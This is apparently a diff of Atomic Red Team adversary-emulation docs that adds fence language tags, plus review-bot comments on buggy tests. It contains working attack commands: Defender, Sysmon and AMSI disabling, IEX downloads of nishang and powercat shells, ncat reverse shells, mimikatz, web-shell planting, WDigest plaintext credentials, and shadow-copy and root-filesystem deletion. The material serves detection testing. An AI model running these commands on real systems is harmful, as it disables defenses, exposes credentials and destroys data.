#### Attack Commands: Run with `sh`!
```
```sh
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
service rsyslog stop
@@ -111,7 +115,9 @@ Disable the Cb Response service
#### Attack Commands: Run with `sh`!
```
```sh
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
service cbdaemon stop
@@ -138,7 +144,9 @@ Disables SELinux enforcement
#### Attack Commands: Run with `sh`!
```
```sh
setenforce 0
```
@@ -158,7 +166,9 @@ Disables Carbon Black Response
#### Attack Commands: Run with `sh`!
```
```sh
sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
```
@@ -178,7 +188,9 @@ Disables LittleSnitch
#### Attack Commands: Run with `sh`!
```
```sh
sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
```
@@ -198,7 +210,9 @@ Disables OpenDNS Umbrella
#### Attack Commands: Run with `sh`!
```
```sh
sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
```
@@ -223,26 +237,29 @@ Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon servic
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
fltmc.exe unload #{sysmon_driver}
```
#### Cleanup Commands:
```
```cmd
sc stop sysmon
fltmc.exe load #{sysmon_driver}
sc start sysmon
```
#### Dependencies: Run with `command_prompt`!
##### Description: Sysmon filter must be loaded
##### Check Prereq Commands:
```
```cmd
fltmc.exe filters | findstr #{sysmon_driver}
```
##### Get Prereq Commands:
```
```cmd
echo Automated installer not implemented yet, please install Sysmon manually
```
@@ -266,12 +283,14 @@ This action requires HTTP logging configurations in IIS to be unlocked.
#### Attack Commands: Run with `powershell`!
```
```powershell
C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true
```
#### Cleanup Commands:
```
```powershell
C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false
```
@@ -295,24 +314,27 @@ Uninstall Sysinternals Sysmon for Defense Evasion
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
sysmon -u
```
#### Cleanup Commands:
```
```cmd
sysmon -i -accepteula
```
#### Dependencies: Run with `powershell`!
##### Description: Sysmon executable must be available
##### Check Prereq Commands:
```
```powershell
if(cmd /c where sysmon) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
$parentpath = Split-Path "#{sysmon_exe}"; $zippath = "$parentpath\Sysmon.zip"
New-Item -ItemType Directory $parentpath -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$zippath"
@@ -321,11 +343,11 @@ if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"}
```
##### Description: Sysmon must be installed
##### Check Prereq Commands:
```
```powershell
if(cmd /c sc query sysmon) { exit 0} else { exit 1}
```
##### Get Prereq Commands:
```
```powershell
cmd /c sysmon -i -accepteula
```
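Review bot: the check prereq `if(cmd /c sc query sysmon) { exit 0} else { exit 1}` treats any output as success, but when the service is missing sc.exe writes its "[SC] EnumQueryServicesStatus:OpenService FAILED 1060" message to standard output, so the captured string is non-empty and the check always passes and the get prereq (`cmd /c sysmon -i -accepteula`) never runs. Test the exit code instead: `cmd /c sc query sysmon | Out-Null; if($LASTEXITCODE -eq 0) {exit 0} else {exit 1}`.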
@@ -344,12 +366,14 @@ https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
#### Attack Commands: Run with `powershell`!
```
```powershell
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
```
#### Cleanup Commands:
```
```powershell
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)
```
@@ -369,12 +393,14 @@ This test removes the Windows Defender provider registry key.
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
```
#### Cleanup Commands:
```
```powershell
New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}"
```
@@ -398,13 +424,15 @@ With administrative rights, an adversary can disable Windows Services related to
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
net.exe stop #{service_name}
sc.exe config #{service_name} start= disabled
```
#### Cleanup Commands:
```
```cmd
sc.exe config #{service_name} start= auto
net.exe start #{service_name}
```
@@ -426,7 +454,9 @@ Credit to Matt Graeber (@mattifestation) for the research.
#### Attack Commands: Run with `powershell`!
```
```powershell
$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0
@@ -434,7 +464,7 @@ $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging']
```
#### Cleanup Commands:
```
```powershell
$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 1
@@ -458,7 +488,9 @@ Credit to Matt Graeber (@mattifestation) for the research.
#### Attack Commands: Run with `powershell`!
```
```powershell
[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
```
@@ -478,7 +510,9 @@ Attempting to disable scheduled scanning and other parts of windows defender atp
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
Set-MpPreference -DisableRealtimeMonitoring 1
Set-MpPreference -DisableBehaviorMonitoring 1
Set-MpPreference -DisableScriptScanning 1
@@ -486,7 +520,7 @@ Set-MpPreference -DisableBlockAtFirstSeen 1
```
#### Cleanup Commands:
```
```powershell
Set-MpPreference -DisableRealtimeMonitoring 0
Set-MpPreference -DisableBehaviorMonitoring 0
Set-MpPreference -DisableScriptScanning 0
@@ -508,14 +542,16 @@ Attempting to disable scheduled scanning and other parts of windows defender atp
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
sc stop WinDefend
sc config WinDefend start=disabled
sc query WinDefend
```
#### Cleanup Commands:
```
```cmd
sc start WinDefend
sc config WinDefend start=enabled
```
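Review bot: `sc config WinDefend start=disabled` and the cleanup `sc config WinDefend start=enabled` both have sc.exe syntax problems. sc requires a space after the option name (`start= disabled`), otherwise it prints usage and changes nothing, and `enabled` is not a valid start type; the valid values are boot, system, auto, demand, disabled and delayed-auto. Compare the service-stop test earlier in this file, which correctly uses `sc.exe config #{service_name} start= disabled` and `start= auto`; this hunk should use the same forms.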
@@ -535,12 +571,14 @@ Disable Windows Defender from starting after a reboot
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1
```
#### Cleanup Commands:
```
```powershell
Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0
```
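Review bot: `Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1` fails with a path-not-found error on any host where that Policies key does not already exist, since Set-ItemProperty does not create missing keys. Precede it with `New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Force | Out-Null`, and have the cleanup use `Remove-ItemProperty ... -Name DisableAntiSpyware` rather than setting the value to 0, so the machine returns to its pre-test state instead of carrying an explicit policy it did not have before.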
@@ -560,7 +598,9 @@ https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-
#### Attack Commands: Run with `powershell`!
```
```powershell
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel"
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security"
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView"
@@ -571,7 +611,7 @@ New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\Prot
```
#### Cleanup Commands:
```
```powershell
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings"
Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView"
```
@@ -593,7 +633,9 @@ https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
```
+8 -4
@@ -31,12 +31,14 @@ Note that this test may conflict with pre-existing system configuration.
#### Attack Commands: Run with `sh`!
```
```sh
export #{proxy_scheme}_proxy=#{proxy_server}
```
#### Cleanup Commands:
```
```sh
unset http_proxy
unset https_proxy
```
@@ -64,12 +66,14 @@ HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
netsh interface portproxy add v4tov4 listenport=#{listenport} connectport=#{connectport} connectaddress=#{connectaddress}
```
#### Cleanup Commands:
```
```powershell
netsh interface portproxy delete v4tov4 listenport=#{listenport}
```
+4 -2
@@ -26,14 +26,16 @@ Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/
#### Attack Commands: Run with `powershell`!
```
```powershell
. $PathToAtomicsFolder\T1093\src\Start-Hollow.ps1
$ppid=Get-Process #{parent_process_name} | select -expand id
Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose
```
#### Cleanup Commands:
```
```powershell
Stop-Process -Name "#{spawnto_process_name}"
```
+12 -5
@@ -29,7 +29,9 @@ refer to the following blog: https://www.blackhillsinfosec.com/how-to-c2-over-ic
#### Attack Commands: Run with `powershell`!
```
```powershell
IEX (New-Object System.Net.WebClient).Downloadstring('https://raw.githubusercontent.com/samratashok/nishang/c75da7f91fcc356f846e09eab0cfd7f296ebf746/Shells/Invoke-PowerShellIcmp.ps1')
Invoke-PowerShellIcmp -IPAddress #{server_ip}
```
@@ -60,20 +62,23 @@ nc -l -p <port>
#### Attack Commands: Run with `powershell`!
```
```powershell
cmd /c #{ncat_exe} #{server_ip} #{server_port}
```
#### Dependencies: Run with `powerShell`!
##### Description: ncat.exe must be available at specified location (#{ncat_exe})
##### Check Prereq Commands:
```
```powerShell
if( Test-Path "#{ncat_exe}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powerShell
New-Item -ItemType Directory -Force -Path #{ncat_path} | Out-Null
$parentpath = Split-Path (Split-Path "#{ncat_exe}"); $zippath = "$parentpath\nmap.zip"
Invoke-WebRequest "https://nmap.org/dist/nmap-7.80-win32.zip" -OutFile "$zippath"
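Review bot: the dependency block in this hunk renders as "Run with `powerShell`!" with fences tagged ```powerShell, because the template emits the executor name verbatim and this test's `dependency_executor_name` is spelled with a capital S. Case-sensitive highlighters will not recognise `powerShell`, so the new fence tag buys nothing here. Either normalise the yaml to `powershell` or lowercase the name in the template's `get_language` so that a typo in one test cannot produce an unknown language tag.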
@@ -106,7 +111,9 @@ nc -l -p <port>
#### Attack Commands: Run with `powershell`!
```
```powershell
IEX (New-Object System.Net.Webclient).Downloadstring('https://raw.githubusercontent.com/besimorhino/powercat/ff755efeb2abc3f02fa0640cd01b87c4a59d6bb5/powercat.ps1')
powercat -c #{server_ip} -p #{server_port}
```
+7 -3
@@ -30,7 +30,9 @@ Execute from Alternate Streams
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 #{path}\procexp.cab #{path}\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump #{path}\procexp.exe > #{path}\file.txt:procexp.exe
@@ -66,7 +68,9 @@ Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.
#### Attack Commands: Run with `powershell`!
```
```powershell
if (!(Test-Path C:\Users\Public\Libraries\yanki -PathType Container)) {
New-Item -ItemType Directory -Force -Path C:\Users\Public\Libraries\yanki
}
@@ -74,7 +78,7 @@ Start-Process -FilePath "$env:comspec" -ArgumentList "/c,type,#{payload_path},>,
```
#### Cleanup Commands:
```
```powershell
Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore
```
+3 -1
@@ -29,7 +29,9 @@ Similar to PTH, but attacking Kerberos
#### Attack Commands: Run with `command_prompt`!
```
```cmd
mimikatz # kerberos::ptt #{user_name}@#{domain}
```
+3 -1
@@ -29,7 +29,9 @@ Manipulate Admin Account Name
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
$x = Get-Random -Minimum 2 -Maximum 9999
$y = Get-Random -Minimum 2 -Maximum 9999
$z = Get-Random -Minimum 2 -Maximum 9999
+21 -7
@@ -34,7 +34,9 @@ Stomps on the access timestamp of a file
#### Attack Commands: Run with `sh`!
```
```sh
touch -a -t 197001010000.00 #{target_filename}
```
@@ -59,7 +61,9 @@ Stomps on the modification timestamp of a file
#### Attack Commands: Run with `sh`!
```
```sh
touch -m -t 197001010000.00 #{target_filename}
```
@@ -87,7 +91,9 @@ Sudo or root privileges are required to change date. Use with caution.
#### Attack Commands: Run with `sh`!
```
```sh
NOW=$(date)
date -s "1970-01-01 00:00:00"
touch #{target_filename}
@@ -119,7 +125,9 @@ This technique was used by the threat actor Rocke during the compromise of Linux
#### Attack Commands: Run with `sh`!
```
```sh
touch -acmr #{reference_file_path} {target_file_path}
```
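Review bot: `touch -acmr #{reference_file_path} {target_file_path}` is missing the `#` on the second placeholder, so the target input is never substituted and touch creates a literal file named `{target_file_path}` in the working directory, leaving the reference file's timestamps copied onto the wrong file. It should read `touch -acmr #{reference_file_path} #{target_file_path}`; fix it in the T1099 yaml so the regenerated markdown picks it up.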
@@ -147,7 +155,9 @@ This technique was seen in use by the Stitch RAT.
#### Attack Commands: Run with `command_prompt`!
```
```cmd
powershell.exe Get-ChildItem #{file_path} | % { $_.CreationTime = #{target_date_time} }
```
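Review bot: `powershell.exe Get-ChildItem #{file_path} | % { $_.CreationTime = #{target_date_time} }` is run from `command_prompt`, where the unquoted `|` is consumed by cmd.exe: only `Get-ChildItem #{file_path}` reaches PowerShell and cmd then tries to execute `%` as a command, so the timestamp is never changed. Wrap the whole PowerShell command in double quotes and quote the date so it parses as a string, e.g. `powershell.exe "Get-ChildItem #{file_path} | % { $_.CreationTime = '#{target_date_time}' }"`. The LastWriteTime and LastAccessTime hunks that follow have the same problem.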
@@ -175,7 +185,9 @@ This technique was seen in use by the Stitch RAT.
#### Attack Commands: Run with `command_prompt`!
```
```cmd
powershell.exe Get-ChildItem #{file_path} | % { $_.LastWriteTime = #{target_date_time} }
```
@@ -203,7 +215,9 @@ This technique was seen in use by the Stitch RAT.
#### Attack Commands: Run with `command_prompt`!
```
```cmd
powershell.exe Get-ChildItem #{file_path} | % { $_.LastAccessTime = #{target_date_time} }
```
+7 -4
@@ -27,24 +27,27 @@ cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/
#### Attack Commands: Run with `command_prompt`!
```
```cmd
xcopy #{web_shells} #{web_shell_path}
```
#### Cleanup Commands:
```
```cmd
del #{web_shell_path} >nul 2>&1
```
#### Dependencies: Run with `powershell`!
##### Description: Web shell must exist on disk at specified location (#{web_shells})
##### Check Prereq Commands:
```
```powershell
if (Test-Path #{web_shells}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1100/src/b.jsp" -OutFile "#{web_shells}/b.jsp"
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1100/src/tests.jsp" -OutFile "#{web_shells}/test.jsp"
+3 -1
View File
@@ -22,7 +22,9 @@ Add a value to a Windows registry SSP key, simulating an adversarial modificatio
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
# run these in sequence
$SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages'
$SecurityPackagesUpdated = $SecurityPackages
+8 -4
View File
@@ -25,12 +25,14 @@ Download data from a public website using command line
#### Attack Commands: Run with `command_prompt`!
```
```cmd
bitsadmin.exe /transfer "DonwloadFile" http://www.stealmylogin.com/ %TEMP%\bitsadmindownload.html
```
#### Cleanup Commands:
```
```cmd
del %TEMP%\bitsadmindownload.html >nul 2>&1
```
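Review bot: nit in the unchanged context line, the BITS job name is spelled `DonwloadFile`; since this file is being regenerated, the source test could correct it to `DownloadFile` at the same time.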
@@ -49,7 +51,9 @@ Multiple download methods for files using powershell
#### Attack Commands: Run with `powershell`!
```
```powershell
Invoke-WebRequest -Uri www.twitter.com
$T1102 = (New-Object System.Net.WebClient).DownloadData("https://www.reddit.com/")
$wc = New-Object System.Net.WebClient
@@ -57,7 +61,7 @@ $T1102 = $wc.DownloadString("https://www.aol.com/")
```
#### Cleanup Commands:
```
```powershell
Clear-Variable T1102 >$null 2>&1
```
+3 -1
View File
@@ -24,7 +24,9 @@ AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded i
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
reg.exe import #{registry_file}
```
+34 -12
View File
@@ -47,7 +47,9 @@ Utilize rsync to perform a remote file copy (push)
#### Attack Commands: Run with `bash`!
```
```bash
rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}
```
@@ -75,7 +77,9 @@ Utilize rsync to perform a remote file copy (pull)
#### Attack Commands: Run with `bash`!
```
```bash
rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}
```
@@ -103,7 +107,9 @@ Utilize scp to perform a remote file copy (push)
#### Attack Commands: Run with `bash`!
```
```bash
scp #{local_file} #{username}@#{remote_host}:#{remote_path}
```
@@ -131,7 +137,9 @@ Utilize scp to perform a remote file copy (pull)
#### Attack Commands: Run with `bash`!
```
```bash
scp #{username}@#{remote_host}:#{remote_file} #{local_path}
```
@@ -159,7 +167,9 @@ Utilize sftp to perform a remote file copy (push)
#### Attack Commands: Run with `bash`!
```
```bash
sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}'
```
@@ -187,7 +197,9 @@ Utilize sftp to perform a remote file copy (pull)
#### Attack Commands: Run with `bash`!
```
```bash
sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
```
@@ -213,7 +225,9 @@ Use certutil -urlcache argument to download a file from the web. Note - /urlcach
#### Attack Commands: Run with `command_prompt`!
```
```cmd
cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}
```
@@ -239,7 +253,9 @@ Use certutil -verifyctl argument to download a file from the web. Note - /verify
#### Attack Commands: Run with `powershell`!
```
```powershell
$datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)"
New-Item -Path $datePath -ItemType Directory
Set-Location $datePath
@@ -271,7 +287,9 @@ This technique is used by Qbot malware to download payloads.
#### Attack Commands: Run with `command_prompt`!
```
```cmd
C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path}
```
@@ -298,12 +316,14 @@ This technique is used by multiple adversaries and malware families.
#### Attack Commands: Run with `powershell`!
```
```powershell
(New-Object System.Net.WebClient).DownloadFile("#{remote_file}", "#{destination_path}")
```
#### Cleanup Commands:
```
```powershell
Remove-Item #{destination_path} -Force -ErrorAction Ignore
```
@@ -327,7 +347,9 @@ OSTap copies itself in a specfic way to shares and secondary drives. This emulat
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
pushd #{destination_path}
echo var fileObject = WScript.createobject("Scripting.FileSystemObject");var newfile = fileObject.CreateTextFile("AtomicTestFileT1105.js", true);newfile.WriteLine("This is an atomic red team test file for T1105. It simulates how OSTap worms accross network shares and drives.");newfile.Close(); > AtomicTestT1105.js
CScript.exe AtomicTestT1105.js //E:JScript
+42 -14
View File
@@ -50,7 +50,9 @@ Delete a single file from the temporary directory
#### Attack Commands: Run with `sh`!
```
```sh
rm -f #{file_to_delete}
```
@@ -75,7 +77,9 @@ Recursively delete the temporary directory and all files contained within it
#### Attack Commands: Run with `sh`!
```
```sh
rm -rf #{folder_to_delete}
```
@@ -100,7 +104,9 @@ Use the `shred` command to overwrite the temporary file and then delete it
#### Attack Commands: Run with `sh`!
```
```sh
shred -u #{file_to_shred}
```
@@ -120,7 +126,9 @@ Delete a single file from the temporary directory using cmd.exe
#### Attack Commands: Run with `command_prompt`!
```
```cmd
echo "T1107" > %temp%\T1107.txt
del /f %temp%\T1107.txt >nul 2>&1
```
@@ -141,7 +149,9 @@ Recursively delete the temporary directory and all files contained within it usi
#### Attack Commands: Run with `command_prompt`!
```
```cmd
mkdir %temp%\T1107
rmdir /s /q %temp%\T1107
```
@@ -162,7 +172,9 @@ Delete a single file from the temporary directory using Powershell
#### Attack Commands: Run with `powershell`!
```
```powershell
New-Item $env:TEMP\T1107.txt
Remove-Item -path $env:TEMP\T1107.txt
```
@@ -188,7 +200,9 @@ Recursively delete the temporary directory and all files contained within it usi
#### Attack Commands: Run with `powershell`!
```
```powershell
New-Item $env:TEMP\T1107 -ItemType Directory
Remove-Item -path $env:TEMP\T1107 -recurse
```
@@ -209,7 +223,9 @@ Delete all volume shadow copies with vssadmin.exe
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
vssadmin.exe Delete Shadows /All /Quiet
```
@@ -229,7 +245,9 @@ Delete all volume shadow copies with wmic
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
wmic shadowcopy delete
```
@@ -249,7 +267,9 @@ This test leverages `bcdedit` to remove boot-time recovery measures.
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
```
@@ -270,7 +290,9 @@ This test deletes Windows Backup catalogs.
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
wbadmin delete catalog -quiet
```
@@ -290,7 +312,9 @@ This test deletes the entire root filesystem of a Linux system. This technique w
#### Attack Commands: Run with `bash`!
```
```bash
rm -rf / --no-preserve-root > /dev/null 2> /dev/null
```
@@ -310,7 +334,9 @@ Delete a single prefetch file. Deletion of prefetch files is a known anti-foren
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0])
```
@@ -333,7 +359,9 @@ https://twitter.com/SBousseaden/status/1197524463304290305?s=20
#### Attack Commands: Run with `powershell`!
```
```powershell
if ($env:os -eq "Windows_NT") {
New-Item $env:TEMP\TeamViewer_54.log
Remove-Item $env:TEMP\TeamViewer_54.log
+3 -1
View File
@@ -51,7 +51,9 @@ Creates username and password files then attempts to brute force on remote host
#### Attack Commands: Run with `command_prompt`!
```
```cmd
net user /domain > #{input_file_users}
echo "Password1" >> #{input_file_passwords}
echo "1q2w3e4r" >> #{input_file_passwords}
+27 -13
View File
@@ -35,12 +35,14 @@ Modify the registry of the currently logged in user using reg.exe cia cmd consol
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f
```
#### Cleanup Commands:
```
```cmd
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /f
```
@@ -60,12 +62,14 @@ CMD is ran as Administrative rights.
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d {some_other_executable} /f
```
#### Cleanup Commands:
```
```cmd
reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f
```
@@ -84,7 +88,9 @@ Modify a registry key of each user profile not currently loaded on the machine u
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
# here is an example of using the same method of reg load, but without the New-PSDrive cmdlet.
# Here we can load all unloaded user hives and do whatever we want in the location below (comments)
$PatternSID = 'S-1-5-21-\d+-\d+\-\d+\-\d+$'
@@ -155,12 +161,14 @@ Sets registry key that will tell windows to store plaintext passwords (making th
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```
```cmd
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
```
@@ -186,7 +194,9 @@ Sets Windows Registry key containing base64-encoded PowerShell code.
#### Attack Commands: Run with `powershell`!
```
```powershell
$OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
@@ -195,7 +205,7 @@ Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_sto
```
#### Cleanup Commands:
```
```powershell
Remove-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -ErrorAction Ignore
```
@@ -215,7 +225,9 @@ https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterpris
#### Attack Commands: Run with `powershell`!
```
```powershell
$key= "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\bad-domain.com\"
$name ="bad-subdomain"
new-item $key -Name $name -Force
@@ -225,7 +237,7 @@ new-itemproperty $key$name -Name * -Value 2 -Type DWORD;
```
#### Cleanup Commands:
```
```powershell
$key = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\bad-domain.com\"
Remove-item $key -Recurse -ErrorAction Ignore
```
@@ -245,12 +257,14 @@ placing javascript in registry for persistence
#### Attack Commands: Run with `powershell`!
```
```powershell
New-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name T1112 -Value "<script>"
```
#### Cleanup Commands:
```
```powershell
Remove-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name T1112 -ErrorAction Ignore
```
+12 -4
View File
@@ -36,7 +36,9 @@ Use screencapture command to collect a full desktop screenshot
#### Attack Commands: Run with `bash`!
```
```bash
screencapture
```
@@ -61,7 +63,9 @@ Use screencapture command to collect a full desktop screenshot
#### Attack Commands: Run with `bash`!
```
```bash
screencapture -x
```
@@ -86,7 +90,9 @@ Use xwd command to collect a full desktop screenshot and review file with xwud
#### Attack Commands: Run with `bash`!
```
```bash
xwd -root -out #{output_file}
xwud -in #{output_file}
```
@@ -112,7 +118,9 @@ Use import command to collect a full desktop screenshot
#### Attack Commands: Run with `bash`!
```
```bash
import -window root
```
+4 -2
View File
@@ -32,12 +32,14 @@ Search through local Outlook installation, extract mail, compress the contents,
#### Attack Commands: Run with `command_prompt`!
```
```cmd
powershell -executionpolicy bypass -command $PathToAtomicsFolder\T1114\Get-Inbox.ps1 -file #{output_file}
```
#### Cleanup Commands:
```
```cmd
del #{output_file} >nul 2>&1
```
+7 -3
View File
@@ -27,14 +27,16 @@ Add data to clipboard to copy off or execute commands from.
#### Attack Commands: Run with `command_prompt`!
```
```cmd
dir | clip
echo "T1115" > %temp%\T1115.txt
clip < %temp%\T1115.txt
```
#### Cleanup Commands:
```
```cmd
del %temp%\T1115.txt >nul 2>&1
```
@@ -53,7 +55,9 @@ Utilize PowerShell to echo a command to clipboard and execute it
#### Attack Commands: Run with `powershell`!
```
```powershell
echo Get-Process | clip
iex Get-Clipboard
```
+15 -7
View File
@@ -32,20 +32,23 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
#### Attack Commands: Run with `command_prompt`!
```
```cmd
regsvr32.exe /s /u /i:#(unknown) scrobj.dll
```
#### Dependencies: Run with `powershell`!
##### Description: Regsvr32.exe must exist on disk at specified location (#(unknown))
##### Check Prereq Commands:
```
```powershell
if (Test-Path #(unknown)) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #(unknown)) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1117/src/RegSvr32.sct" -OutFile "#(unknown)"
```
@@ -69,7 +72,9 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
#### Attack Commands: Run with `command_prompt`!
```
```cmd
regsvr32.exe /s /u /i:#{url} scrobj.dll
```
@@ -94,20 +99,23 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
#### Attack Commands: Run with `command_prompt`!
```
